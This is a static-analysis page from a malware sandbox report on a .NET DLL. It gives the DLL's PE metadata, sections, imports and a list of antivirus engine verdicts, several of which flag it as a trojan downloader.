Static | ZeroBOX

PE Compile Time

2023-11-26 20:47:33

PE Imphash

dae02f32a21e03ce65412f6e56942daa

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00002000       0x000033ac    0x00003400        5.59431156004
.rsrc   0x00006000       0x00000358    0x00000400        2.70319496907
.reloc  0x00008000       0x0000000c    0x00000200        0.0815394123432

Resources

Name        Offset      Size        Language      Sub-language     File type
RT_VERSION  0x00006058  0x000002fc  LANG_NEUTRAL  SUBLANG_NEUTRAL  data

Imports

Library mscoree.dll:
0x10002000 _CorDllMain

Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
MicroWorld-eScan Clean
ClamAV Win.Trojan.Bladbindi-1
FireEye Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Malwarebytes Trojan.Downloader.MSIL.Generic
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
BitDefender Clean
K7GW Clean
CrowdStrike win/malicious_confidence_100% (D)
Arcabit Clean
Baidu Clean
VirIT Clean
Symantec Clean
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/TrojanDownloader.Agent.PIX
APEX Clean
Paloalto Clean
Cynet Clean
Kaspersky Clean
Alibaba Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
TACHYON Clean
Emsisoft Clean
F-Secure Clean
DrWeb Trojan.DownLoaderNET.842
VIPRE Clean
TrendMicro Clean
Trapmine Clean
CMC Clean
Sophos Clean
Ikarus Clean
Jiangmin Clean
Webroot Clean
Google Detected
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Microsoft Trojan:Win32/Wacatac.B!ml
SUPERAntiSpyware Clean
ZoneAlarm Clean
GData Clean
Varist Clean
AhnLab-V3 Malware/Win32.RL_Generic.C3754190
Acronis Clean
McAfee Clean
MAX Clean
DeepInstinct MALICIOUS
VBA32 Clean
Cylance Clean
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Clean
Yandex Clean
SentinelOne Static AI - Malicious PE
MaxSecure Clean
Fortinet MSIL/Injector.UWS!tr
BitDefenderTheta Clean
AVG MSIL:GenMalicious-CQL [Trj]
Avast MSIL:GenMalicious-CQL [Trj]
No IRMA results available.